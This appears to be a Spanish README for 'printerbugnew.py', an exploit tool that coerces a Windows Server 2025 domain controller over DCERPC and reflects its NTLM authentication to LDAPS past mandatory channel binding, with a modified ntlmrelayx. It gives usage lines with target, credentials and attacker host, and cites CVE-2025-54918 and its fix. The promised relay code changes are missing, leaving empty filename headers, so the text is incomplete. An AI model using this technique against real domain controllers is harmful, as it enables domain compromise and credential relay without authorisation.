
La versión de printerbug.py solo DCERPC
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Este exploit por reflexión solo funciona en W2025 con el printerbug "nuevo" (DCERPC en lugar de Named Pipes).
Tendrás que modificar ntlmrelayx en un par de puntos para que funcione. Después de eso, puedes disparar remotamente el printer bug en un DC W2025 y reflejar la autenticación a través de LDAPS(!), incluso si Channel Bindings es OBLIGATORIO
ldaprelayclient.py:

rpcrelayserver.py
y relay ;)

La vulnerabilidad se corrigió en el Patch Tuesday de septiembre de 2025: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
La corrección garantiza que el MIC se calcula siempre, incluso cuando el mensaje Type 3 está vacío.
Gracias al autor de este CVE por la valiosa pista :)